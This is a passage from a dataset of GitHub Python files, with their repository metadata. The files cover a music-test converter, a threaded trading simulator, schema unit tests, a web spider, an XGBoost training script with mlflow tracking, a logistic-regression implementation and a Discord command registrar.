Globals:\n\n def __init__(g, data):\n g.A_fine, g.A_rough, g.B_fine, g.B_rough, g.C_fine, g.C_rough, g.N_period = (data.reg() for _ in range(7))\n g.mixer = data.reg(lambda *v: 0x3f & ~reduce(operator.or_, v, 0))\n g.A_level, g.B_level, g.C_level, g.E_fine, g.E_rough, g.E_shape = (data.reg() for _ in range(6))\n g.A_tone, g.B_tone, g.C_tone, g.A_noise, g.B_noise, g.C_noise = (0x01 << i for i in range(6))\n g.setprev = data.setprev\n g.sleep = data.sleep\n\ndef main():\n for inpath in sys.argv[1:]:\n outpath = inpath[:inpath.rindex('.')] + '.dsd'\n print(outpath, file=sys.stderr)\n data = Data()\n exec(compile(open(inpath).read(), inpath, 'exec'), Globals(data).__dict__)\n with open(outpath, 'wb') as f:\n data.save(f)\n\nif '__main__' == __name__:\n 
main()\n","repo_name":"combatopera/pym2149","sub_path":"ymtests/mkdsd.py","file_name":"mkdsd.py","file_ext":"py","file_size_in_byte":2445,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"27"} +{"seq_id":"885785253","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jul 30 16:27:03 2023\n\n@author: 84752\n\"\"\"\n\n\n\nfrom multiprocessing import Process, Queue\n#from marketDataService import MarketDataService\nfrom exchangeSimulator import ExchangeSimulator\nimport threading\nfrom quantTradingPlatform import TradingPlatform\nfrom MarketDataServer import MarketDataService_Stock, MarketDataService_Future\nfrom QuantStrategy import QuantStrategy\n\nif __name__ == '__main__':\n ###########################################################################\n # Define all components\n ###########################################################################\n '''#for calculating information of all 10 stocks portfolio\n fTicker_lis = ['JBF1', 'QWF1', 'HCF1', 'DBF1', 'EHF1', 'IPF1', 'IIF1', 'QXF1', 'PEF1', 'NAF1']\n sTicker_lis = ['3443','2388', '2498', '2610', '1319', '3035', '3006', '2615', '5425', '3105']'''\n '''#for calculating return for single stock\n fTicker_lis = ['DBF1']\n sTicker_lis = ['2610']'''\n #Our final selection of 3-stock portfolio\n fTicker_lis = ['EHF1', 'IPF1', 'IIF1']\n sTicker_lis = [ '1319', '3035', '3006']\n queue_lis = []\n strategy = QuantStrategy(\"1\", \"leading_lagging_effect\", \"Team 4\", \"Future_stock\", \"20230801\", fTicker_lis, sTicker_lis)\n for i in range(len(fTicker_lis)):\n mktData_string = '''marketData_2_platform_q_{} = Queue(); marketData_2_platform_q_{} = Queue()'''.format(sTicker_lis[i], fTicker_lis[i])\n exec(mktData_string)\n marketData_2_exchSim_q = Queue()\n \n \n platform_2_exchSim_order_q = Queue()\n exchSim_2_platform_execution_q = Queue()\n # stocks = ['1319','2388']#,'2498','2610','2615','3006','3035','3105','3443','5425']\n # futures = ['EHF1', 'QWF1']\n ### Method 1 \n s_md_thread_list = []\n f_md_thread_list = []\n for i in range(len(sTicker_lis)): # start one market-data thread per stock/future pair\n string = '''ts = threading.Thread(target=MarketDataService_Stock,args=(sTicker_lis[{}],marketData_2_exchSim_q, marketData_2_platform_q_{}))\ntf = threading.Thread(target=MarketDataService_Future,args=(marketData_2_exchSim_q, marketData_2_platform_q_{},fTicker_lis[{}],))\nts.start()\ntf.start()\ns_md_thread_list.append(ts)\nf_md_thread_list.append(tf)\n '''.format(i, sTicker_lis[i], fTicker_lis[i], i)\n exec(string)\n \n \n #Process(name='md', target=MarketDataService, args=(marketData_2_exchSim_q, marketData_2_platform_q, )).start()\n t2 = threading.Thread(name='sim', target=ExchangeSimulator, args=(marketData_2_exchSim_q, platform_2_exchSim_order_q, exchSim_2_platform_execution_q, ))\n t2.start()\n s_plat_thread_list = []\n f_plat_thread_list = []\n for i in range(len(sTicker_lis)): # start one trading-platform thread per stock/future pair\n string = '''ts_plat = threading.Thread(target=TradingPlatform,args=(marketData_2_platform_q_{},platform_2_exchSim_order_q,\n exchSim_2_platform_execution_q, strategy))\ntf_plat = threading.Thread(target=TradingPlatform,args=(marketData_2_platform_q_{},platform_2_exchSim_order_q,\nexchSim_2_platform_execution_q, strategy))\nts_plat.start()\ntf_plat.start()\ns_plat_thread_list.append(ts_plat)\nf_plat_thread_list.append(tf_plat)\n '''.format(sTicker_lis[i], fTicker_lis[i])\n exec(string)\n \n for i in range(len(s_md_thread_list)):\n s_md_thread_list[i].join()\n f_md_thread_list[i].join()\n t2.join()\n for i in 
range(len(s_plat_thread_list)):\n s_plat_thread_list[i].join()\n f_plat_thread_list[i].join()\n\n \n ","repo_name":"Joe-Bradley/Python_trading_platform","sub_path":"Code/systemController.py","file_name":"systemController.py","file_ext":"py","file_size_in_byte":3529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"24511622345","text":"import json\nfrom aiofiles import open\nimport os\n\n_path = os.path.dirname(os.path.realpath(__file__))\n\n\nasync def read_settings() -> (dict, dict):\n async with open(\"{path}/../../settings.json\".format(path=_path), \"r\", buffering=True) as settings_file:\n config_data = await settings_file.read()\n data: dict = json.loads(config_data)\n charge_point_info: dict = data[\"charge_point\"][\"info\"]\n hardware_info: dict = data[\"charge_point\"][\"hardware\"]\n await settings_file.close()\n return charge_point_info, hardware_info\n","repo_name":"xBlaz3kx/ChargePi","sub_path":"client/charge_point/data/settings_manager.py","file_name":"settings_manager.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"27"} +{"seq_id":"265420329","text":"\"\"\" test Imaging \"\"\"\n\nimport datetime\nimport unittest\n\nfrom pydantic import ValidationError\n\nfrom aind_data_schema.device import Calibration\nfrom aind_data_schema.imaging import acquisition as acq\nfrom aind_data_schema.imaging import instrument as inst\nfrom aind_data_schema.imaging import mri_session as ms\nfrom aind_data_schema.imaging import tile\nfrom aind_data_schema.manufacturers import Manufacturer\nfrom aind_data_schema.processing import Registration\nfrom aind_data_schema.utils.units import PowerValue\n\n\nclass ImagingTests(unittest.TestCase):\n \"\"\"test imaging schemas\"\"\"\n\n def test_constructors(self):\n \"\"\"testing constructors\"\"\"\n with self.assertRaises(ValidationError):\n a = acq.Acquisition()\n\n a = acq.Acquisition(\n experimenter_full_name=[\"alice\"],\n session_start_time=datetime.datetime.now(),\n specimen_id=\"12345\",\n subject_id=\"1234\",\n instrument_id=\"1234\",\n calibrations=[\n Calibration(\n calibration_date=datetime.datetime.now(),\n description=\"Laser power calibration\",\n device_name=\"Laser 1\",\n input={\"power_setting\": PowerValue(value=100.0, unit=\"percent\")},\n output={\"power_measurement\": PowerValue(value=50.0, unit=\"milliwatt\")},\n ),\n ],\n session_end_time=datetime.datetime.now(),\n chamber_immersion=acq.Immersion(medium=\"PBS\", refractive_index=1),\n tiles=[\n tile.AcquisitionTile(\n coordinate_transformations=[\n tile.Scale3dTransform(scale=[1, 1, 1]),\n tile.Translation3dTransform(translation=[1, 1, 1]),\n ],\n channel=tile.Channel(\n channel_name=\"488\",\n light_source_name=\"Ex_488\",\n filter_names=[\"Em_600\"],\n detector_name=\"PMT_1\",\n excitation_wavelength=488,\n excitation_power=0.1,\n filter_wheel_index=0,\n ),\n )\n ],\n axes=[],\n )\n\n assert a is not None\n\n with self.assertRaises(ValidationError):\n i = inst.Instrument()\n\n i = inst.Instrument(\n instrument_type=\"diSPIM\",\n modification_date=datetime.datetime.now(),\n manufacturer=Manufacturer.LIFECANVAS,\n objectives=[],\n detectors=[],\n light_sources=[],\n )\n\n assert i is not None\n\n with self.assertRaises(ValidationError):\n i = inst.Instrument(\n instrument_type=\"Other\",\n manufacturer=Manufacturer.OTHER,\n objectives=[],\n detectors=[],\n light_sources=[],\n )\n\n with self.assertRaises(ValidationError):\n i = 
inst.Instrument(\n instrument_type=\"diSPIM\",\n manufacturer=Manufacturer.OTHER,\n objectives=[],\n detectors=[],\n light_sources=[],\n )\n\n with self.assertRaises(ValidationError):\n mri = ms.MRIScan(\n scan_sequence_type=\"Other\",\n )\n\n with self.assertRaises(ValidationError):\n mri = ms.MRIScan(scan_sequence_type=\"Other\", notes=\"\")\n\n mri = ms.MriSession(\n experimenter_full_name=[\"Frank Frankson\"],\n subject_id=1234,\n session_start_time=datetime.datetime.now(),\n session_end_time=datetime.datetime.now(),\n protocol_id=\"doi_path\",\n animal_weight_prior=22.1,\n animal_weight_post=21.9,\n mri_scanner=ms.Scanner(\n scanner_location=\"UW SLU\",\n magnetic_strength=7,\n magnetic_strength_unit=\"T\",\n ),\n scans=[\n ms.MRIScan(\n scan_type=\"3D Scan\",\n scan_sequence_type=\"RARE\",\n primary_scan=True,\n axes=[\n acq.Axis(\n name=\"X\",\n dimension=2,\n direction=\"Left_to_right\",\n ),\n acq.Axis(\n name=\"Y\",\n dimension=1,\n direction=\"Anterior_to_posterior\",\n ),\n acq.Axis(\n name=\"Z\",\n dimension=0,\n direction=\"Inferior_to_superior\",\n ),\n ],\n voxel_sizes=tile.Scale3dTransform(scale=[0.01, 0.01, 0.01]),\n echo_time=2.2,\n effective_echo_time=2.0,\n repetition_time=1.2,\n additional_scan_parameters={\"number_averages\": 3},\n )\n ],\n )\n\n assert mri is not None\n\n def test_axis(self):\n \"\"\"test the axis class\"\"\"\n # test that a few work\n test_codes = [\"RAS\", \"LSP\", \"RAI\", \"PAR\"]\n for test_code in test_codes:\n axes = acq.Axis.from_direction_code(test_code)\n assert len(axes) == 3\n\n def test_registration(self):\n \"\"\"test the tile models\"\"\"\n\n t = Registration(\n name=\"Image tile alignment\",\n software_version=\"2.3\",\n start_date_time=datetime.datetime.now(),\n end_date_time=datetime.datetime.now(),\n input_location=\"/some/path\",\n output_location=\"/some/path\",\n code_url=\"http://foo\",\n parameters={},\n registration_type=\"Intra-channel\",\n tiles=[\n tile.Tile(\n coordinate_transformations=[\n tile.Affine3dTransform(affine_transform=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11])\n ]\n ),\n tile.Tile(\n coordinate_transformations=[\n tile.Translation3dTransform(translation=[0, 1, 2]),\n tile.Rotation3dTransform(rotation=[1, 2, 3, 4, 5, 6, 7, 8, 9]),\n tile.Scale3dTransform(scale=[1, 2, 3]),\n ]\n ),\n ],\n )\n\n assert t is not None\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"AllenNeuralDynamics/aind-data-schema","sub_path":"tests/test_imaging.py","file_name":"test_imaging.py","file_ext":"py","file_size_in_byte":6607,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"27"} +{"seq_id":"13117847405","text":"#!/usr/bin/env python\r\n#-*- coding:utf-8 -*-\r\n# author:Administrator\r\n# datetime:2019/1/26 17:02\r\n# software: PyCharm\r\nimport requests\r\nsession=requests.session()\r\ndate_list=[{\"moblienum\":\"17868871347\"},\r\n {\"moblienum\":\"\"},\r\n {\"moblienum\":\"None\"},\r\n {\"moblienum\":\"1786887134711\"}]\r\nfor i in date_list:\r\n resp=session.post(\"http://api.avatardata.cn/MobilePlace/LookUp\",i)\r\n print(resp.text)\r\n if resp.status_code==200:\r\n print(\"testing\")\r\n reat=resp.json()\r\n if i[\"moblienum\"]==\"17868871347\"and reat[\"error_code\"]==0 and reat[\"reason\"]==\"Succes\":\r\n print(\"test passed\")\r\n elif i[\"moblienum\"]!=\"17868871347\"and reat[\"error_code\"]==1:\r\n print(\"test passed\")\r\n else:\r\n 
print(\"test failed\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"RedAnanas/macbendi","sub_path":"date20190126/phone.py","file_name":"phone.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"36206262742","text":"import argparse\nfrom config_loader.config import get_config\nfrom trainer.trainer import train\nfrom utils.parser_helper import str2bool\nimport os\n\nos.environ[\"TOKENIZERS_PARALLELISM\"] = \"false\"\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--config')\nparser.add_argument('--freeze_bert', type=str2bool, default=None)\nparser.add_argument('--freeze_cnn', type=str2bool, default=None)\nparser.add_argument('--batch', type=int, default=None)\nparser.add_argument('--device', type=str, default='cuda')\nparser.add_argument('--experiment_name', type=str, default=None)\nparser.add_argument('--lr', type=float, default=None)\n\nargs = parser.parse_args()\nconfig_path = args.config\nfreeze_bert = args.freeze_bert\nfreeze_cnn = args.freeze_cnn\nbatch_size = args.batch\nlr = args.lr\nexperiment_name = args.experiment_name\ndevice = args.device\nconfig = get_config(config_path)\nif batch_size is not None:\n config.training.batch_size = args.batch\nif freeze_bert is not None:\n config.bert.freeze_bert = freeze_bert\nif freeze_cnn is not None:\n config.encoder.freeze_cnn = freeze_cnn\nif lr is not None:\n config.optimizer.lr = lr\nif experiment_name is not None:\n config.experiment.name = experiment_name\nconfig.experiment.name = \"{}-LR{}\".format(config.experiment.name, config.optimizer.lr)\n\ntrain(config, device)","repo_name":"liuxubo717/cl4ac","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"27"} +{"seq_id":"74916234630","text":"\"\"\"A Script to create and delete slash commands.\"\"\"\nimport os\nimport requests\n\n\nslash_color = lambda: make_request(\n endpoint=\"commands\",\n json={\n \"name\": \"color\",\n \"description\": \"Identify and display a color that you choose\",\n \"options\": [\n {\n \"name\": \"color\",\n \"description\": \"The color you'd like to identify, in any format\",\n \"type\": 3,\n \"required\": True,\n },\n ],\n },\n)\n\n\ndef make_request(endpoint, json):\n r = requests.post(\n url=f\"https://discord.com/api/v8/applications/{os.getenv('APPLICATION_ID')}/{endpoint}\",\n headers={\"Authorization\": f\"Bot {os.getenv('BOT_TOKEN')}\"},\n json=json,\n )\n print(f\"{json['name']}:\", r.status_code)\n\n\nif __name__ == \"__main__\":\n slash_color()\n","repo_name":"LeptoFlare/unnamed-color-bot","sub_path":"commands/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"43934960845","text":"import scrapy\nfrom MovieRP.items import MovierpItem\n\n\nclass movierpSpider(scrapy.Spider):\n # spider name\n name = 'movie'\n # domains the spider may crawl\n allowed_domains = ['movie.douban.com']\n # base URL\n base_url = 'https://movie.douban.com/subject/11537954/comments'\n # start URLs\n start_urls = ['https://movie.douban.com/subject/11537954/comments?status=P']\n # page counter initial value\n count = 1\n # number of pages to crawl\n spider_end = 3\n\n def parse(self, response):\n\n item = MovierpItem()\n\n # next-page URL\n nextPage = self.base_url + response.xpath(\"//div[@id='paginator']/a[@class='next']/@href\").extract()[0]\n\n # extract short-review entries\n node_list = 
response.xpath('//div[@class=\"comment\"]')\n for node in node_list:\n item['name'] = node.xpath('./h3/span[@class=\"comment-info\"]/a/text()').extract()[0]\n item['content'] = node.xpath('./p/span[@class=\"short\"]/text()').extract()[0]\n yield item\n\n\n # page-count control and last-page handling\n if self.count < self.spider_end:\n # increment the page counter \n self.count = self.count + 1\n\n # crawl the next page\n yield scrapy.Request(nextPage, callback=self.parse)\n else:\n # stop the spider\n return None","repo_name":"ravenwritingdesk/scrapy_spider","sub_path":"MovieRP/spiders/movie.py","file_name":"movie.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"16709435872","text":"import unittest\nfrom location import *\n\nclass TestLab1(unittest.TestCase):\n\n def test_repr(self):\n loc = Location(\"SLO\", 35.3, -120.7)\n self.assertEqual(repr(loc),\"Location('SLO', 35.3, -120.7)\")\n\n # Add more tests!\n\n def test_eq_diff_latlon(self):\n \"\"\"testing the eq to make sure that, with different latitudes and the same \n longitudes and vice versa, the locations will not be equal\"\"\"\n loc1 = Location(\"SLO\", 45.7, -40.2)\n loc2 = Location(\"SLO\", 45.7, 0.0)\n loc3 = Location(\"SLO\", 60.2, -40.2)\n loc4 = Location(\"SLO\", 45.7, -40.2)\n self.assertNotEqual(loc1, loc2)\n self.assertEqual(loc1, loc4)\n self.assertNotEqual(loc3, loc4)\n\n\n def test_eq_diff_loc(self):\n \"\"\"test having the same latitude and longitude at different locations\"\"\"\n loc1 = Location(\"Shingle Springs\", 20.0, 47.9)\n loc2 = Location(\"Pismo\", 20.0, 47.9)\n loc3 = Location(\"SLO\", 20.0, 47.9)\n loc4 = Location(\"SLO\", 20.0, 47.9)\n self.assertNotEqual(loc1, loc4)\n self.assertNotEqual(loc2, loc4)\n self.assertEqual(loc3, loc4)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"cpe202fall2019/lab1-srietkerk","sub_path":"location_tests.py","file_name":"location_tests.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"71045343432","text":"# File: \t\tkeyphrase_extractor.py \tv1.0 \t09/07/2021\n# Author:\t\tGerman Garcia Garcia\tgggsman@gmail.com\n# Description:\tThe following script is an automatic terminology or keyphrase extractor that given a text\n#\t\t\t\tinput returns the text itself with the keywords on it highlighted and a list of them,\n#\t\t\t\tthe model has been trained using the system provided in the following github repository.\n# Github:\t\thttps://github.com/3Gsman/DeepTerminologyExtraction\n\nimport sys\nimport os\n\ntry:\n\tfrom flair.models import SequenceTagger\n\tfrom flair.data import Sentence\nexcept:\n\tprint(\"ERROR: 'FLAIR' library not found, please write the command 'pip3 install flair'. \")\n\n# Files loading\nif not os.path.isfile('model.pt'):\n\tprint(\"ERROR: 'model.pt' does not exist, please follow the instructions in README.txt to download the model.\")\n\tsys.exit()\n\ntry:\n\twith open('input.txt') as f:\n\t\tlines = f.readlines()\nexcept IOError:\n\tprint(\"ERROR: 'input.txt' file does not exist. Please create the file in this directory.\")\n\tsys.exit()\n\nmodel = SequenceTagger.load('model.pt')\t\n\ntry:\n\tsentence = Sentence(lines[0])\nexcept:\n\tprint(\"ERROR: 'input.txt' file empty. 
Please introduce the text in 'input.txt'.\")\n\tsys.exit()\n\n# Tag prediction\nmodel.predict(sentence)\n\nlabeled = sentence.to_tagged_string()\n\n# Output processing\nwordList = labeled.split()\n\nit2 = -1\nkeywords = []\nfor i in range(len(wordList)):\n\tif wordList[i] == \"\":\n\t\ttemp = []\n\t\ttemp.append(wordList[i-1])\n\t\tkeywords.append(temp)\n\n\telif wordList[i] == \"\":\n\t\ttemp.append(wordList[i-1])\n\t\tkeywords.append(temp)\n\nstr_keyword = []\nfor item in keywords:\n\tstr_keyword.append(' '.join(item))\n\nstr_keyword = list(set(str_keyword))\n\ntemp2 = [\"ORIGINAL TEXT\",lines[0],\"\",\"TEXT WITH TAGS\",labeled,\"\",\"KEYWORDS\"]\n\ntotxt = temp2 + str_keyword\n\nwith open('output.txt', 'w') as f:\n    for item in totxt:\n        f.write(\"%s\\n\" % item)\n\nprint(\"__________ Script execution completed __________\")","repo_name":"3Gsman/DeepTerminologyExtraction","sub_path":"keyphrase_extractor/keyphrase_extractor.py","file_name":"keyphrase_extractor.py","file_ext":"py","file_size_in_byte":1928,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"12447795306","text":"\"\"\"Module for training the main model\"\"\"\n\nimport json\nimport warnings\nimport pkg_resources\nimport pandas as pd\nimport click\nfrom xgboost import XGBClassifier\nimport joblib\nimport mlflow\nfrom mlflow.models.signature import infer_signature\nfrom src.models.predict_model import predict_model\nfrom src.models.evaluate import evaluate\nfrom src.common_funcs import mlflow_set_tracking_config\n\nwarnings.filterwarnings(\"ignore\")\n\nmlflow_set_tracking_config(\"mlops23regproject\")\n\n\n@click.command()\n@click.argument(\"input_pair_features_train_dataset_path\", type=click.Path(exists=True))\n@click.argument(\"input_pair_features_test_dataset_path\", type=click.Path(exists=True))\n@click.argument(\"input_original_test_dataset_path\", type=click.Path(exists=True))\n@click.argument(\"input_pair_test_metrics_path\", type=click.Path(exists=True))\n@click.argument(\"output_model_path\", type=click.Path())\n@click.argument(\"output_submission_path\", type=click.Path())\n@click.argument(\"output_metrics_path\", type=click.Path())\ndef train_model(  # pylint: disable=too-many-arguments,too-many-locals\n    input_pair_features_train_dataset_path: str,\n    input_pair_features_test_dataset_path: str,\n    input_original_test_dataset_path: str,\n    input_pair_test_metrics_path: str,\n    output_model_path: str,\n    output_submission_path: str,\n    output_metrics_path: str,\n) -> None:\n    \"\"\"Train the main binary classification model on the candidate-pair dataset, produce a csv\n    file of predictions (built from the hold-out set) in the submission format required by the\n    competition, and generate model metrics.\n    Additionally, the following are tracked (via mlflow):\n    - all model parameters,\n    - model metrics,\n    - the model itself.\n\n    Args:\n        input_pair_features_train_dataset_path (str): Path to the csv file of the candidate-pair\n            dataset used for training.\n        input_pair_features_test_dataset_path (str): Path to the csv file of the candidate-pair\n            dataset built from the hold-out set.\n        input_original_test_dataset_path (str): Path to the csv file of the hold-out set in its\n            original format (usually split_test); only the [\"id\"] column is actually needed.\n        input_pair_test_metrics_path (str): Path to the metrics file generated when the paired\n            hold-out dataset was built, used for clearer 
experiment tracking and for deriving additional metrics of the final model.\n        output_model_path (str): Path for saving the trained model. The model is saved\n            via joblib.dump; load it later with joblib.load.\n        output_submission_path (str): Path for the output submission pred (.csv) file\n            built from the hold-out set.\n        output_metrics_path (str): Path to the output json file with model metrics.\n    \"\"\"\n\n    # with mlflow.start_run(run_name=\"test_run\") as mlflow_run:\n    pair_features_train_df = pd.read_csv(input_pair_features_train_dataset_path)\n\n    # Build X and y to pass to the model\n    y_true = pair_features_train_df[\"target_label\"]  # type: ignore\n\n    # All feature columns start with 'ftr_'\n    columns_to_remove = [\n        col for col in pair_features_train_df.columns if not col.startswith(\"ftr_\")  # type: ignore\n    ]\n    # Use inplace to save memory (avoid duplicating the frame)\n    pair_features_train_df.drop(columns=columns_to_remove, inplace=True)  # type: ignore\n    X_features = pair_features_train_df  # pylint: disable=C0103\n\n    # Model params\n    model_params = {\"random_state\": 42, \"n_estimators\": 10, \"verbosity\": 0}\n\n    # Define the model\n    model = XGBClassifier(**model_params)\n\n    # Fit the model\n    model.fit(X_features, y_true)\n\n    joblib.dump(model, output_model_path)\n\n    # Free memory after training the model\n    del pair_features_train_df, y_true\n    # Keep only 2 rows of X_features; they are needed later to build the signature\n    # required for tracking the model in mlflow\n    X_features = X_features.iloc[:2]  # pylint: disable=C0103\n    y_pred = model.predict(X_features)\n\n    # Mlflow tracking model and model params\n    mlflow.log_params(model_params)\n\n    project_ver = pkg_resources.get_distribution(\"mlops23regproject\").version\n    signature = infer_signature(X_features, y_pred)  # inputs, outputs\n    mlflow.xgboost.log_model(\n        model,\n        artifact_path=\"output_model_path\",\n        registered_model_name=f\"general_model_v{project_ver}\",\n        signature=signature,\n    )\n\n    # Free memory\n    del model, X_features, y_pred\n\n    # Predict model on test dataset and save output_submission csv\n    predict_model(\n        output_model_path,\n        input_original_test_dataset_path,\n        input_pair_features_test_dataset_path,\n        output_submission_path,\n    )\n\n    metrics_final = evaluate(\n        input_original_test_dataset_path,\n        output_submission_path,\n        output_metrics_path,\n        return_metrics=True,\n    )\n\n    with open(input_pair_test_metrics_path, encoding=\"UTF-8\") as json_file:\n        metrics_pairs = json.load(json_file)\n\n    # Mlflow tracking experiment metrics\n    mlflow.log_metrics(metrics_pairs)\n    mlflow.log_metrics(metrics_final)\n\n\nif __name__ == \"__main__\":\n    train_model()  # pylint: disable=E1120\n","repo_name":"wisoffe/mlops-23reg-project","sub_path":"src/models/train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":6555,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"43722948575","text":"import matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\n\r\nclass LogisticRegression(object):\r\n    def __init__(self, W_size, n_iter=30, alpha=0.01):\r\n        \"\"\"\r\n        对数几率回归(逻辑回归)的初始化函数\r\n        迭代次数和学习率初始化为30和0.01,实例化逻辑回归时可以传参修改\r\n        :param W_size: 参数W的维度,这里的 W 其实是包含了 W 和 b\r\n        :param n_iter: 迭代次数\r\n        :param alpha: 学习率\r\n        \"\"\"\r\n        # 迭代次数\r\n        self.n_iter = n_iter\r\n        # 学习率\r\n        self.alpha = alpha\r\n        # 系数W\r\n        self.W = np.zeros(W_size)\r\n\r\n 
@staticmethod\r\n def sigmoid(z):\r\n \"\"\"sigmoid函数\"\"\"\r\n return 1 / (1 + np.exp(-z))\r\n\r\n def y_hat_function(self, X):\r\n \"\"\"求y_hat的函数\"\"\"\r\n z = np.matmul(X, self.W)\r\n y_hat = self.sigmoid(z)\r\n return y_hat\r\n\r\n def costFunction(self, X, y):\r\n \"\"\"损失函数\"\"\"\r\n # 求出y_hat\r\n y_hat = self.y_hat_function(X)\r\n # size为样本的个数\r\n size = y.shape[0]\r\n # 将y_hat代入公式,求出损失\r\n cost = np.sum(-y * np.log(y_hat) - (1 - y) * np.log(1 - y_hat)) / size\r\n return cost\r\n\r\n def gradient(self, X, y):\r\n \"\"\"计算梯度\"\"\"\r\n # 求出y_hat\r\n y_hat = self.y_hat_function(X)\r\n # size为样本的个数\r\n size = y.shape[0]\r\n # 求解出损失函数对W的偏导\r\n dW = np.matmul(X.T, (y_hat - y)) / size\r\n return dW\r\n\r\n def BGD(self, X, y):\r\n \"\"\"\r\n 批量梯度下降\r\n :param X: 样本X\r\n :param y: 真实值y\r\n :return: 预测值y_pre,损失的集合cost_data,迭代次数\r\n \"\"\"\r\n # 传入的X和y其实已经是array类型\r\n # 因为在主函数中做数据做处理时已经将转X和y换成为了array类型\r\n # 这里对X和y再次转化array类型是为了再次确认并提高函数的通用性\r\n X = np.array(X)\r\n y = np.array(y)\r\n\r\n # 将W初始为全0的向量,并且多加了一维数据,用来表示b\r\n self.W = np.zeros(X.shape[1]) * self.W\r\n\r\n # 创建一个列表存放计算出来的cost,用于之后的画图\r\n cost_data = []\r\n\r\n # 这里的迭代次数加一是为了能打印更多的迭代信息\r\n # 比如:设置n_iter为20的时候是range(21),实际迭代了0到20共二十一次\r\n # 此时便能打印出第20次的迭代信息\r\n for i in range(self.n_iter + 1):\r\n # 计算梯度并对W进行迭代\r\n dW = self.gradient(X, y)\r\n self.W = self.W - self.alpha * dW\r\n # 计算cost并添加到cost_data列表当中\r\n cost = self.costFunction(X, y)\r\n cost_data.append(cost)\r\n # 每10次计算一次cost并打印一次信息\r\n # if i % 10 == 0:\r\n # print(f'第{i}次迭代:\\t损失是:{cost:.5f},\\tW与b是(前四列是W,第五列是b):{self.W}')\r\n\r\n # 注释了上面每十次打印一次信息,改为只在最后打印一次,这样节省空间\r\n print(f'第{i}次迭代:\\t损失是:{cost:.5f},\\tW与b是(前四列是W,第五列是b):{self.W}')\r\n # 先算出y_hat,再将y_hat进行分类,大于0.5的为1,小于0.5的为0\r\n y_hat = self.y_hat_function(X)\r\n y_pre = np.where(y_hat >= 0.5, 1, 0)\r\n # 返回值cost_data和n_iter是之后绘图所需的参数\r\n return y_pre, cost_data, self.n_iter + 1\r\n\r\n @staticmethod\r\n def probability(y_pre, y):\r\n \"\"\"\r\n :param y_pre: 预测值\r\n :param y: 真实值\r\n :return: 模型预测正确率\r\n \"\"\"\r\n # 传入的y_pre是列表,要转换成array\r\n y_pre = np.array(y_pre)\r\n pro = 1 - np.sum(np.abs(y_pre - y)) / y.shape[0]\r\n return pro * 100\r\n\r\n\r\ndef stratifiedSample(data, ratio):\r\n \"\"\"分层抽样函数\"\"\"\r\n # 把数据集一分为二\r\n # 前一半是第一种鸢尾花,后一半是第二种鸢尾花\r\n data_1 = data.iloc[0:data.shape[0] // 2]\r\n data_2 = data.iloc[data.shape[0] // 2:data.shape[0]]\r\n\r\n # sample frac:按百分比随机抽样 replace:false为不放回的抽样\r\n train_data_1 = data_1.sample(frac=ratio, replace=False)\r\n train_data_2 = data_2.sample(frac=ratio, replace=False)\r\n\r\n # 获取抽取出的样本对应的索引值\r\n train_data_1_index = train_data_1.index.to_list()\r\n train_data_2_index = train_data_2.index.to_list()\r\n\r\n # 将训练样本的索引值进行拼接\r\n train_data_index = train_data_1_index + train_data_2_index\r\n\r\n # 根据索引分割出训练样本与测试样本\r\n train_data = data[data.index.isin(train_data_index)]\r\n test_data = data[~data.index.isin(train_data_index)]\r\n\r\n # 将样本拼接,此时样本的前半部分为训练集,后半部分即为测试集\r\n data = pd.concat([train_data, test_data], axis=0)\r\n return data\r\n\r\n\r\ndef visualization(x, y):\r\n \"\"\"损失函数可视化函数\"\"\"\r\n plt.figure(figsize=(8, 4), dpi=100)\r\n plt.grid(True, linestyle='--', alpha=0.8)\r\n plt.xlabel(\"迭代次数\", fontdict={'size': 14})\r\n plt.ylabel(\"损失\", fontdict={'size': 14})\r\n plt.title(\"损失函数图\")\r\n plt.ylim(0, 0.7)\r\n plt.subplots_adjust(left=0.1, right=0.9, top=0.9, bottom=0.13)\r\n plt.plot(x, y, linewidth=2.5, label=\"cost\")\r\n plt.legend(loc=0)\r\n # 保存图像要在plt.show()之前,要不然保存为空白图片\r\n plt.savefig(\"./picture/cost_picture.png\")\r\n 
